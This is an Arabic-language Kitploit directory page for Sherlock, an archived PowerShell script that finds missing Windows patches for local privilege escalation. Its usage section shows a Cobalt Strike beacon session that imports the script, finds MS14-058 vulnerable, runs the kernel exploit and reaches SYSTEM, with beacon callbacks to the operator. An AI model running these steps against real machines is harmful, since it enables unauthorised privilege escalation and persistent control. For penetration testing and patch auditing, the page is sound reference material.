Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Sherlock — نص PowerShell للعثور بسرعة على تصحيحات البرامج المفقودة لثغرات تصعيد الامتيازات المحلية. | Kitploit
أدوات/GitHubGitHub/rasta-mouse/sherlock
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقArchived
GitHubrasta-mouse/sherlock

Sherlock

نص PowerShell للعثور بسرعة على تصحيحات البرامج المفقودة لثغرات تصعيد الامتيازات المحلية.

عرض المستودع
2.0k4096منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مهمل. ألقِ نظرة على Watson بدلاً من ذلك.

Sherlock

نص PowerShell للعثور بسرعة على تصحيحات البرامج المفقودة للثغرات الأمنية لتصعيد الامتيازات المحلية.

يبحث حالياً عن:

  • MS10-015 : وضع المستخدم إلى الحلقة (KiTrap0D)
  • MS10-092 : جدولة المهام
  • MS13-053 : تجاوز سعة المخزن المؤقت لنواة Win32k في NTUserMessageCall
  • MS13-081 : صفحة NULL في Win32k في TrackPopupMenuEx
  • MS14-058 : إلغاء مرجع المؤشر الفارغ في Win32k في TrackPopupMenu
  • MS15-051 : ClientCopyImage في Win32k
  • MS15-078 : تجاوز سعة المخزن المؤقت لبرنامج تشغيل الخط
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : مقبض تسجيل الدخول الثانوي
  • MS16-034 : تصعيد الامتيازات في برامج تشغيل وضع النواة في Windows
  • MS16-135 : تصعيد الامتيازات في Win32k
  • CVE-2017-7199 : وكيل Nessus 6.6.2 - 6.10.3 تصعيد الامتيازات

الاستخدام الأساسي:

root@kitploit:~
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
تنزيل الأداة